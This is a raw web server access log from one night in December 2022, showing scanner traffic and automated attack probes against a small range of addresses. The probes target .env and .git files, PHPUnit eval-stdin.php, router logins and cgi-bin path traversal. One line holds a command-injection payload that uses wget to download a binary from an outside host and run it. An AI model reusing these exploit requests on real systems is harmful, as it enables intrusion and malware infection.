167.94.138.47 - - [02/Dec/2022:03:37:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.138.47 - - [02/Dec/2022:03:37:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.47 - - [02/Dec/2022:03:37:47 +0100] "PRI * HTTP/2.0" 400 329 "-" "-"
167.94.138.47 - - [02/Dec/2022:03:37:48 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
184.105.247.252 - - [02/Dec/2022:03:43:07 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 Edg/106.0.1370.42"
179.43.177.154 - - [02/Dec/2022:03:43:07 +0100] "\x16\x03\x01" 501 318 "-" "-"
179.43.177.154 - - [02/Dec/2022:03:43:08 +0100] "GET /wp-content/.git/config HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.57 Whale/3.14.133.23 Safari/537.36"
141.255.166.2 - - [02/Dec/2022:03:44:44 +0100] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
54.161.76.154 - - [02/Dec/2022:03:44:58 +0100] "GET /.git/config HTTP/1.1" 404 316 "-" "python-requests/2.25.1"
54.161.76.154 - - [02/Dec/2022:03:45:34 +0100] "GET /.env HTTP/1.1" 404 309 "-" "python-requests/2.25.1"
184.105.247.238 - - [02/Dec/2022:03:48:51 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.126 Safari/537.36"
194.55.186.216 - - [02/Dec/2022:03:50:14 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.83:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
152.89.196.211 - - [02/Dec/2022:03:53:52 +0100] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
159.203.69.69 - - [02/Dec/2022:03:53:56 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0"
159.203.69.69 - - [02/Dec/2022:03:53:56 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "http://212.91.246.89/" "Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0"
152.89.196.211 - - [02/Dec/2022:03:53:58 +0100] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
178.212.53.32 - - [02/Dec/2022:03:56:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
152.89.196.211 - - [02/Dec/2022:03:57:29 +0100] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
152.89.196.211 - - [02/Dec/2022:03:57:38 +0100] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
152.89.196.211 - - [02/Dec/2022:03:59:01 +0100] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
192.241.212.105 - - [02/Dec/2022:03:59:03 +0100] "MGLNDD_212.91.246.88_80" 501 338 "-" "-"
192.241.212.105 - - [02/Dec/2022:03:59:17 +0100] "MGLNDD_212.91.246.81_80" 501 338 "-" "-"
192.241.212.105 - - [02/Dec/2022:03:59:38 +0100] "MGLNDD_212.91.246.84_80" 501 338 "-" "-"
152.89.196.211 - - [02/Dec/2022:03:59:41 +0100] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
152.89.196.211 - - [02/Dec/2022:03:59:59 +0100] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
192.241.212.105 - - [02/Dec/2022:04:00:31 +0100] "MGLNDD_212.91.246.82_80" 501 338 "-" "-"
152.89.196.211 - - [02/Dec/2022:04:00:45 +0100] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
192.241.212.105 - - [02/Dec/2022:04:00:55 +0100] "MGLNDD_212.91.246.89_80" 501 338 "-" "-"
192.241.212.105 - - [02/Dec/2022:04:00:58 +0100] "MGLNDD_212.91.246.85_80" 501 338 "-" "-"
192.241.212.105 - - [02/Dec/2022:04:01:31 +0100] "MGLNDD_212.91.246.86_80" 501 338 "-" "-"
152.89.196.211 - - [02/Dec/2022:04:01:50 +0100] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
192.241.212.105 - - [02/Dec/2022:04:02:00 +0100] "MGLNDD_212.91.246.83_80" 501 338 "-" "-"
192.241.212.105 - - [02/Dec/2022:04:02:15 +0100] "MGLNDD_212.91.246.87_80" 501 338 "-" "-"
192.241.212.105 - - [02/Dec/2022:04:02:39 +0100] "MGLNDD_212.91.246.80_80" 501 338 "-" "-"
152.89.196.211 - - [02/Dec/2022:04:02:42 +0100] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
152.89.196.211 - - [02/Dec/2022:04:04:53 +0100] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
152.89.196.211 - - [02/Dec/2022:04:05:47 +0100] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
152.89.196.211 - - [02/Dec/2022:04:06:02 +0100] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
152.89.196.211 - - [02/Dec/2022:04:06:34 +0100] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
152.89.196.211 - - [02/Dec/2022:04:06:41 +0100] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
152.89.196.211 - - [02/Dec/2022:04:07:15 +0100] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
152.89.196.211 - - [02/Dec/2022:04:08:17 +0100] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
152.89.196.211 - - [02/Dec/2022:04:08:52 +0100] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
152.89.196.211 - - [02/Dec/2022:04:11:38 +0100] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
162.142.125.8 - - [02/Dec/2022:04:11:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
162.142.125.8 - - [02/Dec/2022:04:11:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
162.142.125.8 - - [02/Dec/2022:04:11:55 +0100] "PRI * HTTP/2.0" 400 329 "-" "-"
162.142.125.8 - - [02/Dec/2022:04:11:55 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
152.89.196.211 - - [02/Dec/2022:04:12:00 +0100] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
167.248.133.47 - - [02/Dec/2022:04:16:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
167.248.133.47 - - [02/Dec/2022:04:16:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.248.133.47 - - [02/Dec/2022:04:16:54 +0100] "PRI * HTTP/2.0" 400 329 "-" "-"
167.248.133.47 - - [02/Dec/2022:04:16:55 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
194.55.186.124 - - [02/Dec/2022:04:22:14 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.89:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
194.55.186.216 - - [02/Dec/2022:04:33:26 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.88:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
54.161.76.154 - - [02/Dec/2022:04:34:55 +0100] "GET /.env HTTP/1.1" 404 309 "-" "python-requests/2.25.1"
137.184.160.209 - - [02/Dec/2022:04:37:44 +0100] "\x16\x03\x01" 501 318 "-" "-"
137.184.160.209 - - [02/Dec/2022:04:37:44 +0100] "\x16\x03\x01" 501 318 "-" "-"
137.184.160.209 - - [02/Dec/2022:04:37:44 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
194.55.186.216 - - [02/Dec/2022:04:40:05 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.80:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
84.21.172.205 - - [02/Dec/2022:04:50:16 +0100] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
194.55.186.216 - - [02/Dec/2022:04:51:40 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.84:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
152.89.196.211 - - [02/Dec/2022:04:51:46 +0100] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
193.106.29.122 - - [02/Dec/2022:04:52:02 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0"
152.89.196.211 - - [02/Dec/2022:04:52:17 +0100] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
152.89.196.211 - - [02/Dec/2022:04:52:58 +0100] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
190.232.223.214 - - [02/Dec/2022:04:53:56 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
84.21.172.128 - - [02/Dec/2022:04:55:02 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.85:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
152.89.196.211 - - [02/Dec/2022:04:55:46 +0100] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
152.89.196.211 - - [02/Dec/2022:04:55:47 +0100] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
152.89.196.211 - - [02/Dec/2022:04:59:27 +0100] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
152.89.196.211 - - [02/Dec/2022:04:59:36 +0100] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
152.89.196.211 - - [02/Dec/2022:05:04:20 +0100] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
192.241.203.88 - - [02/Dec/2022:05:04:37 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
192.241.203.88 - - [02/Dec/2022:05:04:42 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
192.241.203.88 - - [02/Dec/2022:05:04:50 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
84.21.172.128 - - [02/Dec/2022:05:05:02 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.86:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
192.241.203.88 - - [02/Dec/2022:05:05:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
193.106.29.122 - - [02/Dec/2022:05:05:36 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0"
109.237.97.180 - - [02/Dec/2022:05:05:39 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
109.237.97.180 - - [02/Dec/2022:05:05:39 +0100] "\x16\x03\x01\x01H\x01" 501 321 "-" "-"
192.241.203.88 - - [02/Dec/2022:05:06:49 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
192.241.203.88 - - [02/Dec/2022:05:06:52 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
152.89.196.211 - - [02/Dec/2022:05:06:52 +0100] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
192.241.203.88 - - [02/Dec/2022:05:07:09 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
152.89.196.211 - - [02/Dec/2022:05:07:49 +0100] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
192.241.203.88 - - [02/Dec/2022:05:07:49 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
192.241.203.88 - - [02/Dec/2022:05:08:29 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
62.233.50.179 - - [02/Dec/2022:05:09:56 +0100] "\x03" 501 316 "-" "-"
62.233.50.179 - - [02/Dec/2022:05:09:57 +0100] "\x03" 501 316 "-" "-"
62.233.50.179 - - [02/Dec/2022:05:09:57 +0100] "\x03" 501 316 "-" "-"
62.233.50.179 - - [02/Dec/2022:05:10:01 +0100] "\x03" 501 316 "-" "-"
62.233.50.179 - - [02/Dec/2022:05:10:01 +0100] "\x03" 501 316 "-" "-"
62.233.50.179 - - [02/Dec/2022:05:10:01 +0100] "\x03" 501 316 "-" "-"
62.233.50.179 - - [02/Dec/2022:05:10:01 +0100] "\x03" 501 316 "-" "-"
62.233.50.179 - - [02/Dec/2022:05:10:02 +0100] "\x03" 501 316 "-" "-"
62.233.50.179 - - [02/Dec/2022:05:10:02 +0100] "\x03" 501 316 "-" "-"
62.233.50.179 - - [02/Dec/2022:05:10:02 +0100] "\x03" 501 316 "-" "-"
194.55.186.124 - - [02/Dec/2022:05:19:57 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.81:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
54.161.76.154 - - [02/Dec/2022:05:20:46 +0100] "GET /.env HTTP/1.1" 404 309 "-" "python-requests/2.25.1"
194.55.186.216 - - [02/Dec/2022:05:22:24 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.81:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
172.91.47.43 - - [02/Dec/2022:05:26:18 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
5.188.210.227 - - [02/Dec/2022:05:28:26 +0100] "GET http://5.188.210.227/echo.php HTTP/1.1" 404 313 "https://www.google.com/" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36"
66.240.236.119 - - [02/Dec/2022:05:34:42 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
66.240.236.119 - - [02/Dec/2022:05:34:42 +0100] "GET /robots.txt HTTP/1.1" 404 315 "-" "-"
66.240.236.119 - - [02/Dec/2022:05:34:43 +0100] "GET /sitemap.xml HTTP/1.1" 404 316 "-" "-"
66.240.236.119 - - [02/Dec/2022:05:34:45 +0100] "GET /.well-known/security.txt HTTP/1.1" 404 329 "-" "-"
66.240.236.119 - - [02/Dec/2022:05:34:46 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0"
198.235.24.5 - - [02/Dec/2022:05:35:38 +0100] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
65.49.20.67 - - [02/Dec/2022:05:36:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36 OPR/90.0.4480.100"
65.49.20.71 - - [02/Dec/2022:05:40:02 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0"
141.255.166.2 - - [02/Dec/2022:05:46:36 +0100] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
173.214.175.178 - - [02/Dec/2022:05:48:03 +0100] "CONNECT cloudflare.com:443 HTTP/1.1" 405 344 "-" "Go-http-client/1.1"
128.14.209.162 - - [02/Dec/2022:05:52:28 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
128.14.209.162 - - [02/Dec/2022:05:52:29 +0100] "GET /showLogin.cc HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
141.255.166.2 - - [02/Dec/2022:05:54:38 +0100] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
152.89.196.211 - - [02/Dec/2022:05:56:13 +0100] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 333 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
152.89.196.211 - - [02/Dec/2022:05:56:16 +0100] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 333 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
152.89.196.211 - - [02/Dec/2022:05:57:27 +0100] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 333 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
152.89.196.211 - - [02/Dec/2022:05:58:00 +0100] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 333 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
152.89.196.211 - - [02/Dec/2022:05:58:29 +0100] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 333 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
152.89.196.211 - - [02/Dec/2022:06:00:15 +0100] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 333 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
152.89.196.211 - - [02/Dec/2022:06:00:18 +0100] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 333 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
152.89.196.211 - - [02/Dec/2022:06:01:10 +0100] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 333 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
152.89.196.211 - - [02/Dec/2022:06:01:11 +0100] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 333 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
128.14.209.162 - - [02/Dec/2022:06:01:44 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
128.14.209.162 - - [02/Dec/2022:06:01:45 +0100] "GET /showLogin.cc HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
152.89.196.211 - - [02/Dec/2022:06:02:21 +0100] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 333 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
142.93.42.136 - - [02/Dec/2022:06:05:11 +0100] "\x16\x03\x01" 501 318 "-" "-"
142.93.42.136 - - [02/Dec/2022:06:05:11 +0100] "\x16\x03\x01" 501 318 "-" "-"
142.93.42.136 - - [02/Dec/2022:06:05:11 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
109.237.97.180 - - [02/Dec/2022:06:07:51 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
109.237.97.180 - - [02/Dec/2022:06:07:51 +0100] "\x16\x03\x01\x01H\x01" 501 321 "-" "-"
193.106.29.122 - - [02/Dec/2022:06:08:25 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0"
141.255.166.2 - - [02/Dec/2022:06:08:51 +0100] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
134.209.47.215 - - [02/Dec/2022:06:10:23 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0"
141.255.166.2 - - [02/Dec/2022:06:11:09 +0100] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
141.255.166.2 - - [02/Dec/2022:06:11:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
141.255.166.2 - - [02/Dec/2022:06:11:22 +0100] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
141.255.166.2 - - [02/Dec/2022:06:12:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
134.209.47.215 - - [02/Dec/2022:06:12:51 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0"
134.209.47.215 - - [02/Dec/2022:06:12:51 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "http://212.91.246.81/" "Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0"
92.118.39.78 - - [02/Dec/2022:06:13:58 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
152.89.196.211 - - [02/Dec/2022:06:15:57 +0100] "GET /actuator/gateway/routes HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
